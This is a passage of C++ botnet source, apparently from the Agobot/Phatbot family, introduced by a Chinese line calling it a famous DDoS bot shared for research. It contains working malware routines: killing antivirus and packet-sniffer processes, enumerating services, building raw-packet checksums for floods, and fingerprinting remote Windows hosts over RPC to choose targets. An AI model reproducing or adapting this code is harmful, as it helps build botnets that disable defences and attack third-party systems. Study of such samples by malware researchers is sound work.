utility.cpp.svn-base

很有名的一款用于组织DDoS的恶意机器人程序。仅供研究学习

				GetModuleFileNameExA( hProcess, hMod, szProcessName,sizeof(szProcessName) );
				process_info pInfo;
				pInfo.sProcessName.Assign(szProcessName);
				pInfo.lProcessPid=aProcesses[i];
				lProcesses->push_back(pInfo);
			}
			CloseHandle( hProcess );
		}
	}
	return TRUE;
#else
	CString sCmdBuf; sCmdBuf.Format("ps ax > tempfile");
	system(sCmdBuf.CStr());

	// FIXME: Parse "ps ax" output here

	DeleteFile("tempfile");
	return true;
#endif // WIN32
}

bool ListServices(std::list<CString> *lServices) {
SC_HANDLE scm=OpenSCManager(NULL,NULL,GENERIC_READ);
if(scm == NULL) { return FALSE; }

const char *szServicesToIgnore[] =
{
	"Ati HotKey Poller", "AudioSrv", "Browser", "CryptSvc", "Dhcp", "dmserver",
	"Dnscache" , "ERSvc" , "Eventlog" , "EventSystem", "FastUserSwitchingCompatibility",
	"helpsvc", "lanmanserver", "lanmanworkstation" , "LmHosts" , "MDM", "Messenger",
	"Netman", "Nla", "PlugPlay", "PolicyAgent", "ProtectedStorage", "RasMan",
	"RpcSs" , "SamSs" , "Schedule" , "seclogon" , "SENS" , "ShellHWDetection",
	"Spooler" , "SSDPSRV" , "stisvc" , "TapiSrv" , "TermService", "TrkWks",
	"uploadmgr" , "upnphost" , "W32Time" , "WebClient", "winmgmt" , "WZCSVC",
	"wuauserv", "srservice", "Themes", NULL
};

DWORD nMemoryNeeded;
DWORD nNumberServices;
DWORD nDummy=0;
BYTE cDummy[16];
CString tmpBuff;
HKEY hkey=NULL; unsigned char szDataBuf2[1024];
char line[100]; DWORD dwSize = 128; LONG lRet=0;
EnumServicesStatus(scm,SERVICE_WIN32,SERVICE_ACTIVE,(ENUM_SERVICE_STATUS *)cDummy,0,&nMemoryNeeded,&nNumberServices,&nDummy);
ENUM_SERVICE_STATUS *lpBuffer=(ENUM_SERVICE_STATUS *)malloc(nMemoryNeeded);
EnumServicesStatus(scm,SERVICE_WIN32,SERVICE_ACTIVE,lpBuffer,nMemoryNeeded,&nMemoryNeeded,&nNumberServices,&nDummy);
for(unsigned int i=0;i<nNumberServices;i++)
{
	for(int a=0; szServicesToIgnore[a]!=NULL; a++)
	{ 
		if(!stricmp(szServicesToIgnore[a], lpBuffer[i].lpServiceName)) goto Next_i;
	}
	
	tmpBuff.Format("SYSTEM\\CurrentControlSet\\Services\\%s",lpBuffer[i].lpServiceName);
	lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, tmpBuff, 0, KEY_READ, &hkey);
	if(lRet != ERROR_SUCCESS)
	{
		tmpBuff.Format("[%s] [????.exe]",lpBuffer[i].lpServiceName);
	}
	else
	{
		lRet = RegQueryValueEx(hkey, "ImagePath", NULL, NULL, szDataBuf2, &dwSize);
		if(lRet != ERROR_SUCCESS)
		{
			tmpBuff.Format("[%s] [????.exe]",lpBuffer[i].lpServiceName);
		}
		else
		{
			tmpBuff.Format("[%s] [%s]",lpBuffer[i].lpServiceName,szDataBuf2);
		}
	}
	lServices->push_back((CString)tmpBuff);
Next_i:
;
}
CloseServiceHandle(scm);
return TRUE;
}

#endif // _WIN32

/*
	This returns the filename of the executable in the filesystem
	Win32:	uses GetModuleFilename on the currently running module
	Linux:	uses /proc/<pid>/exe which is a like to the executable image
*/

char* GetFilename(char* szFilename, size_t sBufSize)
{
#ifdef WIN32
	GetModuleFileName(GetModuleHandle(NULL), szFilename, sBufSize);
	return szFilename;
#else
	char szLinkname[64]; pid_t pSelf=getpid(); int iRet;	
	snprintf(szLinkname, sizeof(szLinkname), "/proc/%i/exe", pSelf);
	iRet=readlink(szLinkname, szFilename, sBufSize);
	if(iRet==-1) return NULL; if(iRet>=sBufSize) { errno=ERANGE; return NULL; }
	szFilename[iRet]=0; return szFilename;
#endif
}

/*
	This calculates a TCP/IP checksum
*/

#ifdef WIN32
	#define USE_ASM
#endif // WIN32

unsigned short checksum(unsigned short *buffer, int size) {
	unsigned long cksum=0;

#ifdef USE_ASM

	unsigned long lsize=size;
	char szMMBuf[8], *pMMBuf=szMMBuf;

	__asm {
		FEMMS

		MOV			ECX, lsize				// ecx=lsize;
		MOV			EDX, buffer				// edx=buffer;
		MOV			EBX, cksum				// ebx=cksum;

		CMP			ECX, 2					// size<2;
		JS			CKSUM_LOOP2				// goto loop 2

CKSUM_LOOP:

		XOR			EAX, EAX				// eax=0;
		MOV			AX, WORD PTR [EDX]		// ax=(unsigned short*)*buffer;
		ADD			EBX, EAX				// cksum+=(unsigned short*)*buffer;

		SUB			ECX, 2					// size-=2;
		ADD			EDX, 2					// buffer+=2;
		CMP			ECX, 1					// size>1;
		JG			CKSUM_LOOP				// while();

		CMP			ECX, 0					// if(!size);
		JE			CKSUM_FITS				// fits if equal

CKSUM_LOOP2:

		XOR			EAX, EAX				// eax=0;
		MOV			AL, BYTE PTR [EDX]		// al=(unsigned char*)*buffer;
		ADD			EBX, EAX				// cksum+=(unsigned char*)*buffer;

		SUB			ECX, 1					// size-=1;
		ADD			EDX, 1					// buffer+=1;
		CMP			ECX, 0					// size>0;
		JG			CKSUM_LOOP2				// while();

CKSUM_FITS:

		MOV			cksum, EBX				// cksum=ebx;

		MOV			EAX, cksum				// eax=cksum;
		SHR			EAX, 16					// eax=cksum>>16;
		MOV			EBX, cksum				// ebx=cksum;
		AND			EBX, 0xffff				// ebx=cksum&0xffff;

		ADD			EAX, EBX				// eax=(cksum>>16)+(cksum&0xffff);

		MOV			EBX, EAX				// ebx=cksum;
		SHR			EBX, 16					// ebx=cksum>>16;
		ADD			EAX, EBX				// cksum+=(cksum>>16);

		MOV			cksum, EAX				// cksum=EAX;

		FEMMS
	}

#else // USE_ASM

	while(size>1) { cksum+=*buffer++; size-=2; }
	if(size) cksum+=*(unsigned char*)buffer;

	cksum=(cksum>>16)+(cksum&0xffff);
	cksum+=(cksum>>16);

#endif // USE_ASM

	return (unsigned short)(~cksum); }

/*
	This returns a static in_addr with a host assigned
*/

in_addr &to_in_addr(unsigned long lHost)
{	static in_addr ina; ina.s_addr=lHost; return ina; }

/*
	This kills all active Antivirus processes that match
	Thanks to FSecure's Bugbear.B analysis @
	http://www.f-secure.com/v-descs/bugbear_b.shtml
*/

void KillAV()
{	
#ifdef WIN32
	KillProcess(NULL);
#else
	KillProcess("tcpdump"); KillProcess("ethereal");
#endif
}

int GetFileSize(FILE *fp)
{	long lLastPos=ftell(fp); fseek(fp, 0, SEEK_END);
	long lFileSize=ftell(fp); fseek(fp, lLastPos, SEEK_SET);
	return (int)lFileSize; }

/*
	This breaks an URL to pieces, and stores them in pURL
*/

bool ParseURL(const char *szURL, url *pURL)
{	if(!szURL) return false; CString sURL; sURL.Assign(szURL);
	// Get the protocol (ie. http), and check if its a supported protocol
	pURL->sProto.Assign(sURL.Token(0, ":"));
	if(pURL->sProto.Compare("http") && pURL->sProto.Compare("ftp")) return false;
	// Check if there are auth infos
	if(sURL.Token(1, "/").Find('@')) {
		// Get the hostname and check if it isnt empty
		pURL->sHost.Assign(sURL.Token(1, "/").Token(1, "@").Token(0, ":"));
		if(!pURL->sHost.Compare("")) return false;
		// Get the port and check if it isnt null
		pURL->iPort=atoi(sURL.Token(1, "/").Token(1, "@").Token(1, ":").CStr());
		if(!pURL->iPort) {
			if(!pURL->sProto.Compare("http")) pURL->iPort=80;
			if(!pURL->sProto.Compare("ftp")) pURL->iPort=21;
		}
		// Get the username and check if it isnt empty
		pURL->sUser.Assign(sURL.Token(1, "/").Token(0, "@").Token(0, ":"));
		if(!pURL->sUser.Compare("")) return false;
		// Get the password and check if it isnt empty
		pURL->sPassword.Assign(sURL.Token(1, "/").Token(0, "@").Token(1, ":"));
		if(!pURL->sPassword.Compare("")) return false;
	} else {
		// Get the hostname and check if it isnt empty
		pURL->sHost.Assign(sURL.Token(1, "/").Token(0, ":"));
		if(!pURL->sHost.Compare("")) return false;
		// Get the port and check if it isnt null
		pURL->iPort=atoi(sURL.Token(1, "/").Token(1, ":").CStr());
		if(!pURL->iPort) {
			if(!pURL->sProto.Compare("http")) pURL->iPort=80;
			if(!pURL->sProto.Compare("ftp")) pURL->iPort=21;
		}
	}
	// Get the request for the server
	CString sReq=sURL.Mid(sURL.Find("/")); sReq=sReq.Mid(sReq.Find("/")); sReq=sReq.Mid(sReq.Find("/"));
	pURL->sReq.Assign("/"); pURL->sReq.Append(sReq);
	return true; }

/*
	This checks if pSearch is contained in pMem
*/

bool MemContains(const char *pMem, const int iMemLen, const char *pSearch, const int iSearchLen)
{	for(int i=0;i<iMemLen-iSearchLen;i++)
		if(!memcmp(pMem+i, pSearch, iSearchLen))
			return true;
	return false; }

char rpcfp_bindstr[]=
	"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
	"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
	"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89"
	"\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
	"\x2b\x10\x48\x60\x02\x00\x00\x00";

char rpcfp_inqifids[]=
	"\x05\x00\x00\x03\x10\x00\x00\x00\x18\x00\x00\x00\x01\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00";

char w2kuuid_sig[]=
	"\xB0\x01\x52\x97\xCA\x59\xD0\x11\xA8\xD5\x00\xA0\xC9\x0D\x80\x51";

char wxpuuid_sig[]=
	"\x26\xB5\x55\x1D\x37\xC1\xC5\x46\xAB\x79\x63\x8F\x2A\x68\xE8\x69";


int FpHost(const char *szHost, int iFpType)
{	switch(iFpType) {
	case FP_RPC:
	{	int iRetVal=OS_UNKNOWN;
		CSocket sSocket; char szRecvBuf[8192];
		if(sSocket.Connect(szHost, 135))
		{	if(!sSocket.Write(rpcfp_bindstr, sizeof(rpcfp_bindstr)-1))
			{	sSocket.Disconnect(); return iRetVal; }
			if(!sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
			{	sSocket.Disconnect(); return iRetVal; }
			if(szRecvBuf[2]==DCE_PKT_BINDACK)
			{	if(!sSocket.Write(rpcfp_inqifids, sizeof(rpcfp_inqifids)-1))
				{	sSocket.Disconnect(); return iRetVal; }
				int iRead=0;
				if(!sSocket.Recv(szRecvBuf, sizeof(szRecvBuf), &iRead))
				{	sSocket.Disconnect(); return iRetVal; }
				if(szRecvBuf[2]==DCE_PKT_RESPONSE)
				{	if(MemContains(szRecvBuf, iRead, w2kuuid_sig, sizeof(w2kuuid_sig)-1))
					{	if(iRead<300) iRetVal=OS_WINNT; else iRetVal=OS_WIN2K; }
					else if(MemContains(szRecvBuf, iRead, wxpuuid_sig, sizeof(wxpuuid_sig)-1))
						iRetVal=OS_WINXP;
					else
						iRetVal=OS_UNKNOWN; }
				else
				{	sSocket.Disconnect(); return iRetVal; } }
			else
			{	sSocket.Disconnect(); return iRetVal; } }
		else
		{	sSocket.Disconnect(); return iRetVal; }
		sSocket.Disconnect(); return iRetVal; }
		break;
	case FP_PORT5K:
		if(ScanPort(szHost, 5000)) return OS_WINXP;
		break;
	case FP_TTL:
		return OS_UNKNOWN;
		break;
	default:
		return OS_UNKNOWN;
		break; }
	return OS_UNKNOWN; }

/*
	Blocked message:
554- (RTR:DU)  The IP address you are using to connect to AOL is a dynamic
554- (residential) IP address.  AOL will not accept future e-mail transactions
554- from th